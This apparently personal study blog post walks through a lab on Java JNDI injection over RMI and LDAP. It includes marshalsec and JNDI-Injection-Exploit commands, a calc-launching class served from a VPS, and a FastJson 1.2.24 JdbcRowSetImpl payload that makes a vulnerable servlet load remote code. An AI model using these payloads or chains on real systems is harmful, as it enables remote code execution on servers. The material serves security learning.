从0到1java安全6

最新推荐文章于 2024-12-01 23:53:54 发布
最新推荐文章于 2024-12-01 23:53:54 发布
阅读量259 收藏
点赞数
分类专栏: 学习历程 文章标签: 安全 java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_29948489/article/details/130774902
版权
本文详细介绍了JNDI(JavaNamingandDirectoryInterface)注入的概念,包括RMI和LDAP服务的利用条件。通过示例代码展示了如何触发JNDI注入,提到了不同JDK版本下的差异以及利用工具如JNDI-Injection-Exploit和marshalsec。还讨论了FastJson漏洞结合JNDI注入的场景,并提供了相关POC和绕过策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点

JNDI详解

什么是jndi注入

JDNI注入安全问题

JDNI注入利用条件

https://blog.youkuaiyun.com/dupei/article/details/120534024
https://www.mi1k7ea.com/2019/09/15/%E6%B5%85%E6%9E%90JNDI%E6%B3%A8%E5%85%A5/#LDAP-Reference%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7

项目案例

img

JNDI注入-RMI&LDAP服务

JNDI全称为 Java Naming and DirectoryInterface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。(个人理解就是接口操作)

RMI:远程方法调用注册表

LDAP:轻量级目录访问协议

调用检索:

​ Java为了将Object对象存储在Naming或Directory服务下,提供了Naming Reference功能,对象可以通过绑定Reference存储在Naming或Directory服务下,比如RMI、LDAP等。 javax.naming.InitialContext.lookup()

在RMI服务中调用了InitialContext.lookup()的类有:

org.springframework.transaction.jta.JtaTransactionManager.readObject()

com.sun.rowset.JdbcRowSetImpl.execute()

javax.management.remote.rmi.RMIConnector.connect()

org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName(String sfJNDIName)

在LDAP服务中调用了InitialContext.lookup()的类有:

InitialDirContext.lookup()

Spring LdapTemplate.lookup()

LdapTemplate.lookupContext()

新建项目Jndi-Inject-Demo

在这里插入图片描述

在这里插入图片描述

新建JndiDemo类(lookup里后边服务器生成的class地址)

package com.example.jndiinjectdemo;

import javax.naming.InitialContext;
import javax.naming.NamingException;

public class JndiDemo {
    public static void main(String[] args) throws NamingException {
        //创建一个rmi/ldap等服务调用 实例化对象
        InitialContext initialContext = new InitialContext();
        //调用rmi/ldap等服务对象类
        initialContext.lookup("ldap://47.115.204.183:1389/awyh88");
    }
}

在这里插入图片描述

在这里插入图片描述

JNDI远程调用-JNDI-Injection
jdk版本1.8
工具地址:
https://github.com/welk1n/JNDI-Injection-Exploit

点击运行后,成功弹出计算器。vps也显示有远程请求调用(这里使用的ldap,那么换rmi试试)

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

这里在改成rmi协议后并未执行,这个利用的成功链和java的版本有关。

在这里插入图片描述

在这里插入图片描述

那么使用JDK1.7利用链试一试,rmi无效,ldap可用。这个在后边会讲到版本之间的差异

在这里插入图片描述

在这里插入图片描述

总结使用方法

1、使用远程调用(默认端口1389)

new InitialContext().lookup(“ldap://xx.xx.xx.xx:1389/Test”);

new InitialContext().lookup(“rmi://xx.xx.xx.xx:1099/Test”);

2、使用利用工具生成调用地址

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “calc” -A xx.xx.xx.xx

JNDI远程调用-marshalsec
//工具地址
https://github.com/RandomRobbieBF/marshalsec-jar

新建一个JndiTest类(注意是直接在java下,不然调用时会报错,血坑)

package com.example.jndiinjectdemo;

import java.io.IOException;

public class TestJndi {
    public TestJndi() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
}

错误示范❌
在这里插入图片描述

在这里插入图片描述

在该目录下打开终端

在这里插入图片描述

生成class类,点击文件以后会自动反编译,看到里面的代码

javac .\TestJndi.java

在这里插入图片描述

将生成的class文件放到vps的/var/www/html下,(装个nginx或者开python3起个临时web都可以,这里使用nginx)

访问可以下载,说明没问题。

在这里插入图片描述

使用刚刚下载的工具,会监听现在的1389端口(ldap)1399端口(rmi)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0/#TestJndi

在这里插入图片描述

将JndiDemo的调用地址修改为刚刚测试的class文件名。、

47.115.204.183:1389/TestJndi

在进行运行

package com.example.jndiinjectdemo;

import javax.naming.InitialContext;
import javax.naming.NamingException;

public class JndiDemo {
    public static void main(String[] args) throws NamingException {
        //创建一个rmi/ldap等服务调用 实例化对象
        InitialContext initialContext = new InitialContext();
        //调用rmi/ldap等服务对象类
        // initialContext.lookup("ldap://47.115.204.183:1389/5zhf1o");
        initialContext.lookup("ldap://47.115.204.183:1389/TestJndi");
    }
}

在这里插入图片描述

在使用RMI协议请求,无响应(这边注意端口是1099)

在这里插入图片描述

总结(可以自定义)

JNDI远程调用-marshalsec

1、使用远程调用(默认端口1389)

new InitialContext().lookup(“ldap://xx.xx.xx.xx:1389/Test”);

new InitialContext().lookup(“rmi://xx.xx.xx.xx:1099/Test”);

2、编译调用对象

javac Test.java

3、使用利用工具生成调用协议(rmi,ldap)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0/#Test

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://0.0.0.0/#Test

4、将生成的Class存放访问路径

JNDI注入-JDK高版本注入绕过

在这里插入图片描述

java版本是"1.8.0_181"

​ 从上图可以看到是在RMI-JNDI和LDAP-JNDI之间,所以这个版本在RMI协议全部失效了。而LDAP可以使用,1.7的LDAP可以使用的原因是因为1.8继承了1.7的写法,相当于是同一类,所以可以用。

​ 这边由于个人原因只有这个JDK版本,可以下去试试其它的版本。

​ 如果是8U113以下的就可以使用RMI的协议去做。

​ 这里就解释了为什么我们在上边选用的时候先用的是LDAP服务而不是RMI。LDAP相比RMI的选择JDK范围更大、更具有广泛性。

​ 上边的两个JNDI的注入工具,由于调用链不同,能不能执行也不同,所以工具多试试。

在这里插入图片描述

相关绕过

https://github.com/Bl0omZ/JNDIEXP
https://tttang.com/archive/1405/
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

JNDI注入-FastJson漏洞结合

在这里插入图片描述

在这里插入图片描述

mvn引入fastjson1.2.24,刷新加载

<!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>

在这里插入图片描述

FastJsonWeb类

package com.example.fastjsonjndiweb;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

@WebServlet("/json")
public class FastJsonWeb extends HelloServlet{
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String jsondata = req.getParameter("str");
        System.out.println(jsondata);
        JSONObject jsonObject = JSON.parseObject(jsondata);
        System.out.println(jsonObject);
    }
}

index.jsp

<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
<!DOCTYPE html>
<html>
<head>
    <title>JSP - Hello World</title>
</head>
<body>
<h1><%= "Hello World!" %>
</h1>
<br/>
<a href="hello-servlet">Hello Servlet</a>
</body>
<form action="http://localhost:8080/FastJsonJndiWeb_war_exploded/json" method="post">
    <label>
        JSON data:<input type="text" name="str">
        <input type="submit" value="提交">
    </label>


</form>
</html>

在这里插入图片描述

在这里插入图片描述

payload

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.115.204.183:1389/t4iqdx","autoCommit":true}

在提交地方点击后,弹出计算器。还是JDK原因,RMI协议无法使用

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

黑盒的角度,发现fastjson,并进行利用

在这里插入图片描述

案例

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

https://blog.youkuaiyun.com/weixin_49150931/article/details/126056687
白盒角度,POC为什么这么写

和之前讲到的FastJson反射的进行对比

String test = "{\"@type\":\"com.FastjsonDemo.Run\",\"age\":\"30\",\"name\":\"zhangsanSEC\"}";

//RUN类的计算器是我们自己写的,来进行调用的

在这里插入图片描述

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.115.204.183:1389/t4iqdx","autoCommit":true}

这个payload指向的是JdbcRowSetImpl类

ldap的调用类是 javax.naming.InitialContext.lookup()

两者如何联系起来呢?

调用 ldap/rmi javax.naming.InitialContext.lookup()

在这里插入图片描述

相当com.sun.rowset.JdbcRowSetImpl.execute()里面就有javax.naming.InitialContext.lookup(),相当于继承了

总结

1、Jndi- rmi/ldap服务

2、rmi ldap 都可以进行远程调用 可以远程加载class类

3、攻击利用是用到了jndi-inject项目和marshalsec

​ jdk高版本会限制rmi和ldap使用(有专门的高版本绕过方法)

4、利用要知道其他类也能调用JNDI注入

Java基础知识 1Java入门级概述
学Java,找哪吒
09-25 16万+
优快云最强Java专栏,包含全部Java基础知识点、Java8新特性、Java集合、Java多线程、Java代码实例,理论结合实战,实现Java的轻松学习。
保姆级教学:Java项目从01部署到云服务器
逐梦苍穹的博客
01-27 7817
本文带你从01部署Java项目,包括JDK、MySQL、redis、redis、tomcat的一系列环境安装部署的内容,部署完整的环境到云服务器上。
01java安全4
qq_29948489的博客
05-18 96
因为在UserDemo中有写readObject()方法,所以在执行的序列化的过程中去执行了自己写的的readObject()类,而不是本地环境自带的readObject()类~如果说我们不用自带的jdk的readObject()整个方法,自己写一个readObject()呢?能够实现数据的持久化,通过序列化可以把数据永久的保存在硬盘上,也可以理解为通过序列化将数据保存在文件中。当去掉序列化代码时,没有请求访问。跟进readobject(),是在jdk自带的readObject()方法中。
【从0开始学Java52期】包装类的装箱与拆箱问题
关注我!带你一路 "狂飙" 到底!
04-14 2203
这篇文章中给大家继续讲解包装类的装箱和拆箱问题。你可能会很好奇,做java开发,怎么还装起箱子来了?那么就请大家带着疑惑往下看吧。
Java 安全-JNDI注入学习
Townmacro的博客
05-23 1617
背景知识 JNDI Service Provider JNDI 与 JNDI Service Provider 的关系类似于 Windows 中 SSPI 与 SSP 的关系。前者是统一抽象出来的接口,而后者是对接口的具体实现。如默认的 JNDI Service Provider 有 RMI/LDAP 等等。 ObjectFactory 每一个 Service Provider 可能配有多个 Object Factory。Object Factory 用于将 Naming Service(如 RMI/L
Day37:安全开发-JavaEE应用&JNDI注入&RMI服务&LDAP服务&JDK绕过&调用链类
qq_61553520的博客
03-12 1512
小迪安全-Day37:安全开发-JavaEE应用&JNDI注入&RMI服务&LDAP服务&JDK绕过&调用链类
JNDIExploit使用方法
qq_50854662的博客
02-28 5384
JNDIExploit使用方法
Java 同步锁性能的最佳实践:从理论到实践的完整指南
最新发布
张彦峰的博客
12-01 9万+
在多线程编程中,锁是保证线程安全的重要手段之一,但如何选择合适的锁并进行优化,一直是我们面临的挑战。本博客探讨Java中同步锁的性能分析与优化之路,从使用同步锁和不使用同步锁的性能对比入手,逐步展开对锁的优化手段和技术原理的解析,帮助读者更好地理解和应用Java中的锁机制。
java零基础从入门到精通(全)
码农研究僧的博客
07-18 5万+
目录前言1. 入门知识1.1 java体系1.2 JDK/JRE/JVM区别1.3 编译与运行理解1.4 类体函数细节2. 标识符 前言 java优势 健壮性(JVM(C++语言写的一个虚拟的计算机)、GC(垃圾回收机制)) 多线程并发 可移植性/跨平台 1. 入门知识 1.1 java体系 JavaSE:标准版 JavaEE:企业版 JavaME:微型版 1.2 JDK/JRE/JVM区别 JVM是不能独立安装的。 JRE和JDK都是可以独立安装的 层层嵌套,jvm包括jdk,jdk包括jre
Java 线程安全处理详解
m0_38053034的博客
10-18 1618
线程安全是指在多线程环境下,程序的行为能够始终保持一致性和正确性,多个线程同时访问共享资源时,不会导致数据不一致或程序状态异常。线程安全是并发编程中的重要问题,多线程环境下的共享资源访问必须通过适当的同步机制进行控制。Java 提供了多种线程安全处理机制,包括volatile、原子类、显式锁以及并发集合等。在实际开发中,选择合适的线程安全处理方式非常关键。对于简单的同步场景,可以使用和volatile;对于复杂的场景,显式锁和并发集合类提供了更灵活的控制方式。
java jndi的使用
03-30
NULL 博文链接:https://javaeedevelop.iteye.com/blog/1326583
java jdni
03-05
java,jdni
JAVA安全之Log4j-Jndi注入原理以及利用方式
shelter1234567的博客
11-08 3623
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式
测试开发进阶——常用中间件概念——JDNI——连接数据库理解
小白龙白龙马的博客
09-24 652
JNDI的基本应用JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口)。1.命名的概念与应用 JNDI中的命名(Naming),就是将Java对象以某个名称的形式...
Java代码审计】JNDI注入篇
大河之犬的博客
03-07 4229
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDI 是 Java EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务中绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
java安全(四) JNDI
weixin_45694388的博客
03-25 9069
JNDI JNDI(Java Naming and Directory Interface)是Java提供的Java 命名和目录接口。通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDI是Java EE的重要部分,需要注意的是它并不只是包含了DataSource(JDBC 数据源),JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA 通俗理解,使用jndi作为数据源而不是直接去连接数据库,将数据库交给jndi去配置管理,jndi通过数据源名称去应用数据
JAVA】什么是JNDI?
后端研发工程师Marion的博客
11-22 836
一、参考资料 JNDI学习总结(一):JNDI到底是什么?_wn084的博客-优快云博客
Java JNDI使用详解
marylgao技术专栏
10-09 4828
JNDI基本介绍 JNDI(Java Naming and Directory Interface–Java命名和目录接口)是Java中为命名和目录服务提供接口的API,通过名字可知道,JNDI主要由两部分组成:Naming(命名)和Directory(目录),其中Naming是指将对象通过唯一标识符绑定到一个上下文Context,同时可通过唯一标识符查找获得对象,而Directory主要指将某一对象的属性绑定到Directory的上下文DirContext中,同时可通过名字获取对象的属性同时操作属性。 J
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值